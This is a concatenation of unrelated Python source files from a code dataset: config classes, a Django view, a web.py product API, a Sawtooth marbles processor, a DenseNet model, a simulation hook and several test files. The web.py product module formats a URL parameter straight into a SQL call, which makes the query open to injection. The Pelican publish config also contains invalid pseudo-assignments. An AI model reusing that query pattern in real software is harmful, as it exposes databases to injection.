in configuration.keys()}\n else:\n self._configs = {i: CompanyConfiguration(identifier=i, configuration=configuration[i]) for i in configuration.keys()}\n\n @classmethod\n def for_schema(cls, schema: str) -> CompanyConfigurations:\n config = {\n schema: {\n 'company_metadata': {\n 'currency': '',\n 'display_name': '',\n },\n 'products': {},\n 'task_sets': {},\n }\n }\n return cls(configuration=config)\n\n @classmethod\n def from_legacy_json(cls, legacy_json: str) -> CompanyConfigurations:\n return cls(configuration={'legacy': True, **json.loads(legacy_json)})\n\n @classmethod\n def from_json(cls, data: str):\n data = json.loads(data)\n return CompanyConfigurations(configuration=data)\n\n @classmethod\n def from_sql(cls, schema: str):\n pass\n\n @property\n def configs(self) -> List[CompanyConfiguration]:\n return [self._configs[i] for i in sorted(self._configs.keys())]\n\n @property\n def company_identifiers(self) -> List[str]:\n return [c.identifier for c in self.configs]\n\n @property\n def product_identifiers(self) -> List[str]:\n return list(sorted({p for c in self.configs for p in c.product_identifiers}))\n\n @property\n def task_set_identifiers(self) -> List[str]:\n return list(sorted({t for c in self.configs for t in c.task_set_identifiers}))\n\n @property\n def action_identifiers(self) -> List[str]:\n return list(sorted({a for c in self.configs for a in c.action_identifiers}))\n\n @property\n def target_identifiers(self) -> List[str]:\n return list(sorted({t for c in self.configs for t in c.target_identifiers}))\n\n @property\n def task_type_identifiers(self) -> List[str]:\n return list(sorted({t for c in self.configs for t in c.task_type_identifiers}))\n \n def filtered(self, companies_filter: Optional[List[str]]=None, actions_filter: Optional[List[ReportAction]]=None, targets_filter: Optional[List[ReportTarget]]=None, task_sets_filter: Optional[List[str]]=None, task_types_filter: Optional[List[ReportTaskType]]=None) -> CompanyConfigurations:\n filtered = CompanyConfigurations(configuration=self.as_dict)\n if companies_filter is not None:\n filtered._configs = {c.identifier: c for c in filtered.configs if c.identifier in companies_filter}\n filtered._configs = {\n c.identifier: c.filtered(\n actions_filter=actions_filter,\n targets_filter=targets_filter,\n task_sets_filter=task_sets_filter,\n task_types_filter=task_types_filter\n )\n for c in filtered.configs\n }\n return filtered\n\n def as_sql(self, schema: str):\n pass\n\n @property\n def as_json(self) -> str:\n return json.dumps(self.as_dict, sort_keys=True, indent=2)\n\n @property\n def as_dict(self) -> Dict[str, any]:\n return { c.identifier: c.as_dict for c in self.configs }","sub_path":"config/company_configuration.py","file_name":"company_configuration.py","file_ext":"py","file_size_in_byte":10954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"522269924","text":"from django.template import RequestContext\nfrom django.shortcuts import render_to_response\nfrom Gammu.models import Inbox, SentItems\n# Create your views here.\ndef home(request):\n sent_items = SentItems.objects.all()\n inbox = Inbox.objects.all()\n return render_to_response('UjuServer/home.html',\n {'sent_items':sent_items,'inbox':inbox,},\n context_instance=RequestContext(request)\n )\n","sub_path":"UjuServer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"221454941","text":"import os\nimport sys\n\n# Required for relative imports to also work when called\n# from project root directory.\nsys.path.append(os.path.dirname(__file__))\nfrom database_utils import execute_file\n\nCREATE_TABLE_SQL = 'BAG_create_table.sql'\n\ndef main():\n\tfolder = os.path.dirname(os.path.realpath(__file__))\n\tpath = os.path.join(folder, CREATE_TABLE_SQL)\n\texecute_file(path)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"utils/BAG_create_table.py","file_name":"BAG_create_table.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"137798622","text":"import web\nimport json\nfrom data.security import *\nfrom data.dataAccess import *\nfrom data.product import *\nfrom factory.product import *\nfrom logger.logger import *\nfrom httpError import *\n\nclass ProductTypeList:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"select * from Tejuana.Product_Type\")\n\t\t\treturn productTypeListFactory(results)\n\nclass ProductSupplies:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"select * from Tejuana.ProductSuppliesList\")\n\t\t\treturn productSuppliesListFactory(results)\n\nclass Tags:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"select * from Tejuana.Tag\")\n\t\t\treturn tagFactory(results)\n\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\ttag = json.loads(data)\n\t\t\tinsertTag(tag)\n\nclass ProductsByType:\n\tdef GET(self, prodType):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"call Tejuana.ProductListBy({0})\".format(prodType))\n\t\t\timages = query(\"SELECT * FROM Tejuana.Product_Image\")\n\n\t\t\treturn productListFactory(results, images)\n\nclass Product:\n\tdef GET(self):\t\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"select * from Tejuana.ProductList\")\n\t\t\timages = query(\"SELECT * FROM Tejuana.Product_Image\")\n\n\t\t\treturn productListFactory(results, images)\n\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tproduct = json.loads(data)\n\t\t\tvalidateProduct(product)\n\t\t\tinsertProduct(product)\n\n\tdef PUT(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tproduct = json.loads(data)\n\t\t\tvalidateProduct(product)\n\t\t\tupdateProduct(product)\n\nclass AddProductType:\n\tdef POST(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tdata = web.data()\n\t\t\tlogPayload(data)\n\t\t\tproductType = json.loads(data)\n\t\t\tinsertProductType(productType)\n\t\t\t\n\n################################################################################\n#VALIDATORS\n################################################################################\n\ndef validateProduct(product):\n\tif (product[\"Name\"] == \"hola\"):\n\t\traise BadRequest(\"Producto invalido: No puede llamarse hola\")","sub_path":"rest/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"197602786","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ------------------------------------------------------------------------------\n'''\nTransaction family class for marbles.\n'''\n\nimport traceback\nimport sys\nimport hashlib\nimport logging\n\nfrom sawtooth_sdk.processor.handler import TransactionHandler\nfrom sawtooth_sdk.processor.exceptions import InvalidTransaction\nfrom sawtooth_sdk.processor.exceptions import InternalError\nfrom sawtooth_sdk.processor.core import TransactionProcessor\n\nLOGGER = logging.getLogger(__name__)\n\nFAMILY_NAME = \"marbles\"\n\n\ndef _hash(data):\n '''Compute the SHA-512 hash and return the result as hex characters.'''\n return hashlib.sha512(data).hexdigest()\n\n\n# Prefix for marbles is the first six hex digits of SHA-512(TF name).\nsw_namespace = _hash(FAMILY_NAME.encode('utf-8'))[0:6]\n\n\nclass Marble:\n def __init__(self, args):\n if len(args) != 4:\n raise InvalidTransaction(\"Invalid number of args\")\n\n self.name = args[0]\n self.color = args[1]\n self.size = int(args[2])\n self.owner = args[3]\n\n def to_string(self):\n return \",\".join([self.name, self.color, str(self.size), self.owner])\n\n\nclass MarblesTransactionHandler(TransactionHandler):\n ''' \n Transaction Processor class for the marbles transaction family. \n\n This with the validator using the accept/get/set functions.\n It implements functions to init, read, transfer and delete marble.\n '''\n\n def __init__(self, namespace_prefix):\n self._namespace_prefix = namespace_prefix\n\n @property\n def family_name(self):\n return FAMILY_NAME\n\n @property\n def family_versions(self):\n return ['1.0']\n\n @property\n def namespaces(self):\n return [self._namespace_prefix]\n\n def apply(self, transaction, context):\n '''This implements the apply function for this transaction handler.\n\n This function does most of the work for this class by processing\n a single transaction for the marbles transaction family. \n '''\n\n # Get the payload and extract marbles-specific information.\n header = transaction.header\n payload_list = transaction.payload.decode().split(\",\")\n operation = payload_list[0]\n args = payload_list[1:]\n\n # Get the public key sent from the client.\n from_key = header.signer_public_key\n\n # Perform the operation.\n LOGGER.info(\"Operation = \" + operation)\n\n if operation == \"initMarble\":\n self._init_marble(context, args)\n elif operation == \"deleteMarble\":\n self._delete_marble(context, args)\n elif operation == \"transferMarble\":\n if len(payload_list) == 3:\n to_key = payload_list[2]\n self._transfer_marble(context, args)\n else:\n LOGGER.info(\"Unhandled action. \" +\n \"Operation should be deposit, withdraw or transfer\")\n\n def _init_marble(self, context, args):\n key = args[0]\n marble_address = self._get_marble_address(key)\n LOGGER.info('Got the key {} and the marble address {} '.format(\n key, marble_address))\n current_entry = context.get_state([marble_address])\n\n if current_entry != []:\n raise InvalidTransaction(\"Marble already exists\")\n\n state_data = str(','.join(args)).encode('utf-8')\n addresses = context.set_state({marble_address: state_data})\n\n if len(addresses) < 1:\n raise InternalError(\"State Error\")\n\n def _delete_marble(self, context, args):\n if len(args) != 1:\n raise InvalidTransaction(\"Invalid number of args\")\n\n key = args[0]\n marble_address = self._get_marble_address(key)\n LOGGER.info('Got the key {} and the wallet address {} '.format(\n key, marble_address))\n marble = context.get_state([marble_address])\n new_balance = 0\n\n if marble == []:\n LOGGER.info('No marble with the key {} '.format(key))\n return\n\n LOGGER.info('Deleting marble {} '.format(key))\n addresses = context.delete_state([marble_address])\n\n if len(addresses) < 1:\n raise InternalError(\"State Error\")\n\n def _transfer_marble(self, context, args):\n if len(args) != 2:\n raise InvalidTransaction(\"Invalid number of args\")\n\n key = args[0]\n to_person = args[1]\n\n marble_address = self._get_marble_address(key)\n LOGGER.info('Got the from key {} and the from wallet address {} '.format(\n key, marble_address))\n current_entry = context.get_state([marble_address])\n\n if current_entry == []:\n raise InvalidTransaction(\"Marble does not exist\")\n\n marble = Marble(current_entry[0].data.decode().split(\",\"))\n marble.owner = to_person\n\n context.set_state({marble_address: marble.to_string().encode('utf-8')})\n\n def _get_marble_address(self, from_key):\n return _hash(FAMILY_NAME.encode('utf-8'))[0:6] + _hash(from_key.encode('utf-8'))[0:64]\n\n\ndef setup_loggers():\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n\n\ndef main():\n '''Entry-point function for the marbles transaction processor.'''\n setup_loggers()\n try:\n # Register the transaction handler and start it.\n processor = TransactionProcessor(url='tcp://validator:4004')\n\n handler = MarblesTransactionHandler(sw_namespace)\n\n processor.add_handler(handler)\n\n processor.start()\n\n except KeyboardInterrupt:\n pass\n except SystemExit as err:\n raise err\n except BaseException as err:\n traceback.print_exc(file=sys.stderr)\n sys.exit(1)\n","sub_path":"pyprocessor/processor/marbles_tp.py","file_name":"marbles_tp.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"616484334","text":"\"\"\"\nThe hook simulation driver for a Hybrid CME-ODE JCVI Syn3A simulation.\n\nAuthor: David Bianchi\n\"\"\"\n\nimport Simp as Simp\nimport Rxns as Rxns\nimport integrate as integrate\nimport copy as copy\nimport in_out as in_out\nimport sys\nimport pandas as pd\nimport numpy as np\nimport time as timer\nimport lm as lm\n\n### Define our own hybrid CME-ODE solver class derived from the LM Gillespie Direct Solver:\nclass MyOwnSolver(lm.GillespieDSolver):\n\n\n def __init__(self, delt, ode_step, speciesCount,cythonBool,resTime,procID):\n\n \"\"\"\n Initialize the ODE hook solver\n\n Parameters:\n self, the object pointer\n delt (float), communication timestep between hook simulation and main LM simulation\n ode_step (float), the maximum stepsize given an Adaptive Timestepping ODE solver\n speciesCount (species Count), instance of SpeciesCount Class used to pass species count data\n cythonBool (bool), Should ODE Reaction Solver be compiled with Cython (True, False)\n resTime (float), the total simulation time of each CME Hook Simulation = Restart Time (in minutes)\n procID (str), The Process ID for each simulated \"cell\".\n \n\n Returns:\n None\n \"\"\"\n\n # Call the constructor for the derived class\n # Not necessary to use MESolverFactory.setSolver('lm::cme::GillespieDSolver)?\n lm.GillespieDSolver.__init__(self)\n\n # Save the initial conditions, for restarting the solver upon a new replicate\n self.ic = (delt,ode_step,speciesCount,cythonBool,resTime)\n\n # The time a which hook solver has been stepped into, initial value = 0\n self.oldtime = 0.0\n\n # The process ID for creating flux log files etc.\n self.procID = str(procID)\n\n print(\"initializing solver\")\n\n # Set the initial conditions\n self.restart()\n \n def restart(self):\n\n \"\"\"\n Get the same initial conditions for a new simulation replicate (Restart the Hook)\n\n Parameters:\n self, the object pointer\n\n Returns:\n None\n \"\"\"\n \n # Set the previous time to be 0, we are starting the simulation\n self.oldtime = 0.0\n\n # Deep Copy of all of the initial conditions\n self.delt = copy.deepcopy(self.ic[0])\n self.odestep = copy.deepcopy(self.ic[1])\n self.species = copy.deepcopy(self.ic[2])\n self.cythonBool = copy.deepcopy(self.ic[3])\n self.resTime = copy.deepcopy(self.ic[4])\n\n # Update need enzyme Counts in the particle map\n self.species.update(self)\n\n print(\"Done with restart\")\n\n \n \n def hookSimulation(self, time):\n\n \"\"\"\n The hookSimulation method defined here will be called at every frame write\n time. The return value is either 0 or 1, which will indicate if we\n changed the state or not and need the lattice to be copied back to the GPU\n (In the case of the RDME) before continuing. If you do not return 1, \n your changes will not be reflected.\n\n Parameters:\n self, the object pointer\n time, the current simulation time\n\n Returns:\n\n 1 (int), if changes should be passed to the main LM Simulation\n 0 (int), if changes should not be passed to the main lm Simulation\n \"\"\"\n\n # We have reached the simulation start time, if doing multiple replicates\n # No need to update\n if (time==0.0):\n print(\"New Replicate\", flush=True)\n self.restart()\n minute = 0\n return 0\n\n # We are at a CME-ODE communication timestep\n else:\n\n # At the first timestep update the needed protein counts\n if ((time > self.delt) and (time < (self.delt*2.0))):\n self.species.update(self)\n #Simp.upIC(self.species)\n #Simp.upIC(self.species)\n\n # Update to current solver species counts\n start = timer.time()\n print(\"Updating species: \", start)\n self.species.update(self)\n end = timer.time()\n print(\"Finished update: \",end)\n print(\"Time is: \",time)\n\n # Initialize and define the reaction model\n model = Simp.initModel(self.species)\n\n\n ### Want to get the current values, not necessarily the initial values\n initVals=integrate.getInitVals(model)\n\n ### Boolean control of cython compilation, versus scipy ODE solvers\n cythonBool = self.cythonBool\n\n if (cythonBool == True):\n solver=integrate.setSolver(model)\n \n else:\n solver=integrate.noCythonSetSolver(model)\n\n ### Run the integrator: But instead of passing self.delt pass self.oldtime\n res = integrate.runODE(initVals,time,self.oldtime,self.odestep,solver,model)\n\n resFinal = res[-1,:]\n \n resStart = res[0,:]\n \n if (int(time)/100).is_integer():\n print('Progress: ' + str(int(time)) + ' out of ' + str(int(self.resTime)))\n \n if (int(time)/60).is_integer():\n minute = int(int(time)/60)\n currentFluxes = solver.calcFlux(0, resStart )\n\n # Create list of reactions and fluxes\n fluxList = []\n for indx,rxn in enumerate(model.getRxnList()):\n fluxList.append( (rxn.getID(), currentFluxes[indx]) )\n\n fluxDF = pd.DataFrame(fluxList)\n\n fluxFileName = '../simulations/fluxes/' + 'rep-' + self.procID + '-fluxDF.csv' #'/fluxDF_'+str(self.iter)+'min_start.csv'\n\n fluxDF.to_csv(fluxFileName,header=False,mode='a')\n \n minute = int(int(time)/60)\n currentFluxes = solver.calcFlux(0, resFinal )\n\n # Create list of reactions and fluxes\n fluxList = []\n for indx,rxn in enumerate(model.getRxnList()):\n fluxList.append( (rxn.getID(), currentFluxes[indx]) )\n\n fluxDF = pd.DataFrame(fluxList)\n\n fluxFileName = '../simulations/fluxes/' + 'rep-' + self.procID + '-fluxDF-end.csv' #'/fluxDF_'+str(self.iter)+'min_end.csv'\n\n fluxDF.to_csv(fluxFileName,header=False,mode='a')\n \n\n fluxFileName = '../simulations/fluxes/' + 'rep-' + self.procID + '-fluxDF.csv' #'/fluxDF_'+str(self.iter)+'min.csv'\n\n fluxDF.to_csv(fluxFileName,header=False,mode='a')\n\n print('Saved fluxes at ' + str(minute) + ' minutes.')\n \n print('Saved final fluxes.')\n\n\n if time > (self.resTime-self.delt):\n print(time)\n minute = int(int(time)/60)\n finalFluxes = solver.calcFlux(0, resFinal )\n\n # Create list of reactions and fluxes\n fluxList = []\n for indx,rxn in enumerate(model.getRxnList()):\n fluxList.append( (rxn.getID(), finalFluxes[indx]) )\n\n fluxDF = pd.DataFrame(fluxList)\n fnStr='../simulations/fluxes/'+ 'rep-' + self.procID + '-fluxDF_final.csv' #'/' + str(self.iter) + 'fluxDF_final.csv'\n print(\"Writing Final Fluxes and Csvs for Restart\")\n fluxDF.to_csv(fnStr,index=False,header=False,mode='a')\n\n\n # Get the previous time in minutes\n minute = int(int(time)/60)\n # Set the previous time to the current time\n self.oldtime = time\n\n\n # Write the results\n in_out.writeResults(self.species,model,resFinal,time,self.procID)\n\n\n # Update the system with changes\n return 1\n\n return 0\n\n \n","sub_path":"CME_ODE/program/hook_restart.py","file_name":"hook_restart.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"462974570","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*- #\r\nfrom __future__ import unicode_literals\r\n\r\n# This file is only used if you use `make publish` or\r\n# explicitly specify it as your config file.\r\n\r\nimport os\r\nimport sys\r\nsys.path.append(os.curdir)\r\nfrom pelicanconf import *\r\n\r\nSITEURL = 'n'\r\nRELATIVE_URLS = False\r\n\r\nFEED_ALL_ATOM = 'feeds/all.atom.xml'\r\nCATEGORY_FEED_ATOM = 'feeds/%s.atom.xml'\r\n\r\nDELETE_OUTPUT_DIRECTORY = True\r\n\r\n# Following items are often useful when publishing\r\n\r\n#DISQUS_SITENAME = \"\"\r\n# DISQUS_SITENAME = \"https-hazelement-github-io.disqus.com\"\r\n#GOOGLE_ANALYTICS = \"\"\r\n\r\n# Display pages list on the top menu\r\nDISPLAY_PAGES_ON_MENU (True)\r\n\r\n# Display categories list on the top menu\r\nDISPLAY_CATEGORIES_ON_MENU (False)\r\n\r\n# Display categories list as a submenu of the top menu\r\nDISPLAY_CATEGORIES_ON_SUBMENU (True)\r\n\r\n# Display the category in the article's info\r\nDISPLAY_CATEGORIES_ON_POSTINFO (False)\r\n\r\n# Display the author in the article's info\r\nDISPLAY_AUTHOR_ON_POSTINFO (False)\r\n\r\n# Display the search form\r\nDISPLAY_SEARCH_FORM (True)\r\n\r\n# Sort pages list by a given attribute\r\nPAGES_SORT_ATTRIBUTE (Title)\r\n\r\n# Display the \"Fork me on Github\" banner\r\nGITHUB_URL (None)\r\n\r\n# Blogroll\r\nLINKS \r\n\r\n# Social widget\r\nSOCIAL","sub_path":"publishconf.py","file_name":"publishconf.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"594228140","text":"#!/usr/bin/python3\nimport os\nimport unittest\nfrom datetime import datetime\nfrom pdb import set_trace\nimport handler\nimport json\n\nclass UploaderTests(unittest.TestCase):\n\n def setUp(self):\n self.mockfile = './mockfile'\n\n\n def test_get_url(self):\n \"\"\" This should validate '/' endpoint with all the validation steps, e.g\n before_request, after_request, version validation and etc.\n \"\"\"\n return\n # response = self.app.post('/')\n # json = response.json\n # timestamp = json.get('timestamp', None)\n\n # self.assertTrue(response.status_code == 200)\n # self.assertTrue(json.get('id', None))\n # self.assertTrue(json.get('upload_uri', None))\n # self.assertTrue(timestamp)\n # self.assertTrue(json['upload_uri'].endswith(json['id']))\n # self.assertTrue(datetime.strptime(timestamp, \"%a, %d %b %Y %H:%M:%S %Z\"))\n\n\n def test_upload_asset_wrong(self):\n events = {\n 'queryStringParameters': { 'id': 'testfilehere' },\n }\n resp = handler.upload_asset(events, {})\n self.assertTrue(resp['statusCode'] == 404)\n\n\n def test_upload_asset(self):\n resp = handler.get_url({}, {})\n id = resp.get('body', {}).get('id', None)\n self.assertTrue(id)\n\n events = {\n 'queryStringParameters': { 'id': id},\n }\n\n resp = handler.upload_asset(events, {})\n self.assertTrue(resp['statusCode'] < 300)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"448859377","text":"import torch\nimport torch.nn as nn\nfrom torchvision.models.densenet import _Transition, _DenseBlock\nimport torch.nn.functional as F\nfrom collections import OrderedDict\n\n\n# Mostly copied from PyTorch implementation with some subtle changes\n# 1. Kernal size of initial features brought down from 7 to 3\n# 2. Removed the 3x3 max pooling layer (we already do enough downsampling)\n# 3. Remove the first DenseBlock with 6 layers; we don't want more than 3\n# DenseBlocks given our input size so the block with least layers is removed\nclass DenseNetCustom(nn.Module):\n r\"\"\"Densenet-BC model class, based on\n `\"Densely Connected Convolutional Networks\" `_\n\n Args:\n growth_rate (int) - how many filters to add each layer (`k` in paper)\n block_config (list of 4 ints) - how many layers in each pooling block\n num_init_features (int) - the number of filters to learn in the first convolution layer\n bn_size (int) - multiplicative factor for number of bottle neck layers\n (i.e. bn_size * k features in the bottleneck layer)\n drop_rate (float) - dropout rate after each dense layer\n num_classes (int) - number of classification classes\n \"\"\"\n def __init__(self, growth_rate=32, block_config=(6, 12, 24, 16),\n num_init_features=64, bn_size=4, drop_rate=0, num_classes=1000):\n\n super(DenseNetCustom, self).__init__()\n\n # First convolution\n self.features = nn.Sequential(OrderedDict([\n ('conv0', nn.Conv2d(3, num_init_features, kernel_size=3, stride=1, padding=1, bias=False)),\n ('norm0', nn.BatchNorm2d(num_init_features)),\n ('relu0', nn.ReLU(inplace=True)),\n ]))\n\n # Each denseblock\n num_features = num_init_features\n for i, num_layers in enumerate(block_config):\n block = _DenseBlock(num_layers=num_layers, num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n self.features.add_module('denseblock%d' % (i + 1), block)\n num_features = num_features + num_layers * growth_rate\n if i != len(block_config) - 1:\n trans = _Transition(num_input_features=num_features, num_output_features=num_features // 2)\n self.features.add_module('transition%d' % (i + 1), trans)\n num_features = num_features // 2\n\n # Final batch norm\n self.features.add_module('norm5', nn.BatchNorm2d(num_features))\n\n # Linear layer\n self.classifier = nn.Linear(num_features, num_classes)\n\n def forward(self, x):\n features = self.features(x)\n out = F.relu(features, inplace=True)\n out = F.adaptive_avg_pool2d(out, (1, 1))\n out = torch.flatten(out, 1)\n out = self.classifier(out)\n return out\n\ndef DenseNetMini(**kwargs):\n r\"\"\" Clipped densenet model with growth rate of 16\n `\"Densely Connected Convolutional Networks\" `_\n \"\"\"\n model = DenseNetCustom(num_init_features=32, growth_rate=16, block_config=(6, 12, 24, 16),\n **kwargs)\n\n return model\n\ndef DenseNetClipped(**kwargs):\n r\"\"\" Clipped densenet model with growith rate of 32\"\"\"\n model = DenseNetCustom()\n return model\n\n\n\n\n\n\n\n\n","sub_path":"models/DensenetCustom.py","file_name":"DensenetCustom.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"643371765","text":"from unittest import mock, TestCase\nimport os\nimport time\nimport json\nfrom datetime import datetime as dt\nfrom requests.exceptions import HTTPError\nimport pytz\nfrom pushshift_py import PushshiftAPIMinimal\nfrom tests.mock_response import MockResponse\n\n# pylint: disable=too-many-public-methods\nclass TestPushshiftAPIMinimal(TestCase):\n _pushshift_args = [\n \"sort\",\n \"sort_type\",\n \"after\",\n \"before\",\n \"after_id\",\n \"before_id\",\n \"created_utc\",\n \"score\",\n \"gilded\",\n \"edited\",\n \"author\",\n \"subreddit\",\n \"distinguished\",\n \"retrieved_on\",\n \"last_updated\",\n \"q\",\n \"id\",\n \"metadata\",\n \"unique\",\n \"pretty\",\n \"html_decode\",\n \"permalink\",\n \"user_removed\",\n \"mod_removed\",\n \"subreddit_type\",\n \"author_flair_css_class\",\n \"author_flair_text\",\n \"reply_delay\",\n \"nest_level\",\n \"sub_reply_delay\",\n \"utc_hour_of_week\",\n \"link_id\",\n \"parent_id\",\n \"over_\",\n \"locked\",\n \"spoiler\",\n \"is_video\",\n \"is_self\",\n \"is_original_content\",\n \"is_reddit_media_domain\",\n \"whitelist_status\",\n \"parent_whitelist_status\",\n \"is_crosspostable\",\n \"can_gild\",\n \"suggested_sort\",\n \"no_follow\",\n \"send_replies\",\n \"link_flair_css_class\",\n \"link_flair_text\",\n \"num_crossposts\",\n \"title\",\n \"selftext\",\n \"quarantine\",\n \"pinned\",\n \"stickied\",\n \"category\",\n \"contest_mode\",\n \"subreddit_subscribers\",\n \"url\",\n \"domain\",\n \"thumbnail\",\n \"description\",\n \"public_description\",\n \"title\",\n \"header_title\",\n \"submit_text\",\n \"subscribers\",\n \"comment_score_hide_mins\",\n \"suggested_comment_sort\",\n \"submission_type\",\n \"spoilers_enabled\",\n \"lang\",\n \"is_enrolled_in_new_modmail\",\n \"audience_target\",\n \"allow_videos\",\n \"allow_images\",\n \"allow_videogifs\",\n \"advertiser_category\",\n \"hide_ad\",\n \"subreddit_type\",\n \"wiki_enabled\",\n \"user_sr_theme_enabled\",\n \"whitelist_status\",\n \"submit_link_label\",\n \"show_media_preview\",\n ]\n\n _search_test_data = (\n {\n \"data\": [\n {\"created_utc\": 1530046703, \"id\": \"e1ccvn7\", \"score\": 1},\n {\"created_utc\": 1530047319, \"id\": \"e1ccvn8\", \"score\": 2},\n {\"created_utc\": 1530047619, \"id\": \"e1ccvn9\", \"score\": -3},\n {\"created_utc\": 1530047719, \"id\": \"e1ccvna\", \"score\": 5},\n {\"created_utc\": 1530047819, \"id\": \"e1ccvnb\", \"score\": 8},\n ]\n },\n {\n \"data\": [\n {\"created_utc\": 1530048703, \"id\": \"e1cdvn7\", \"score\": -1},\n {\"created_utc\": 1530049319, \"id\": \"e1cdvn8\", \"score\": -2},\n {\"created_utc\": 1530049619, \"id\": \"e1cdvn9\", \"score\": 3},\n {\"created_utc\": 1530049719, \"id\": \"e1cdvna\", \"score\": -5},\n {\"created_utc\": 1530049819, \"id\": \"e1cdvnb\", \"score\": -8},\n ]\n },\n {\n \"data\": [\n {\"created_utc\": 1530148703, \"id\": \"e1cdvn7\", \"score\": -1},\n {\"created_utc\": 1530149319, \"id\": \"e1cdvn8\", \"score\": -2},\n {\"created_utc\": 1530149619, \"id\": \"e1cdvn9\", \"score\": 3},\n {\"created_utc\": 1530149719, \"id\": \"e1cdvna\", \"score\": -5},\n {\"created_utc\": 1530149819, \"id\": \"e1cdvnb\", \"score\": -8},\n ]\n },\n )\n\n # We always have to set rate limit so that the class doesn't query for it\n _rate_limit = 60\n _base_init_kwargs = {\n \"max_retries\": 27,\n \"max_sleep\": 2390,\n \"backoff\": 7,\n \"rate_limit_per_minute\": 123,\n \"max_results_per_request\": 500,\n \"detect_local_tz\": False,\n \"utc_offset_secs\": 11,\n \"domain\": \"testapi\",\n }\n\n # pylint: disable=protected-access\n def _test_base_init(self, api):\n self.assertEqual(27, api.max_retries)\n self.assertEqual(2390, api.max_sleep)\n self.assertEqual(7, api.backoff)\n self.assertEqual(500, api.max_results_per_request)\n self.assertEqual(\"testapi\", api.domain)\n\n self.assertEqual(False, api._detect_local_tz)\n self.assertEqual(11, api._utc_offset_secs)\n\n self.assertEqual(123, api._rlcache.max_storage)\n\n def test_init(self):\n api = PushshiftAPIMinimal(**self._base_init_kwargs)\n self._test_base_init(api)\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._get\")\n def test_init_none_rate_limit(self, mock_get):\n mock_get.return_value = {\"server_ratelimit_per_minute\": 420}\n api = PushshiftAPIMinimal(rate_limit_per_minute=None)\n self.assertEqual(420, api._rlcache.max_storage)\n\n def test_base_url(self):\n api = PushshiftAPIMinimal(\n domain=\"test-domain\", rate_limit_per_minute=self._rate_limit\n )\n self.assertEqual(\"https://test-domain.pushshift.io/{endpoint}\", api.base_url)\n\n def test_utc_offset_secs(self):\n api = PushshiftAPIMinimal(\n detect_local_tz=False, rate_limit_per_minute=self._rate_limit\n )\n self.assertEqual(0, api.utc_offset_secs)\n\n api = PushshiftAPIMinimal(\n detect_local_tz=True, rate_limit_per_minute=self._rate_limit\n )\n for timezone in pytz.common_timezones:\n api._utc_offset_secs = None\n os.environ[\"TZ\"] = timezone\n time.tzset()\n\n expected_secs = dt.utcnow().astimezone().utcoffset().total_seconds()\n actual_secs = api.utc_offset_secs\n\n self.assertEqual(expected_secs, actual_secs)\n\n def test_limited(self):\n # Test all of the arguments listed at\n # https://pushshift.io/api-parameters/\n for arg in self._pushshift_args:\n self.assertFalse(PushshiftAPIMinimal._limited({arg: True}))\n\n # Test the limited arguments\n for arg in PushshiftAPIMinimal._limited_args:\n self.assertTrue(PushshiftAPIMinimal._limited({arg: True}))\n\n def test_epoch_utc_to_local(self):\n timestamps = [\n 1429981843,\n 1519981843,\n 1528981843,\n 1529781843,\n 1529881843,\n 1529931843,\n 1529981843,\n ]\n\n for timestamp in timestamps:\n api = PushshiftAPIMinimal(\n detect_local_tz=False, rate_limit_per_minute=self._rate_limit\n )\n self.assertEqual(timestamp, 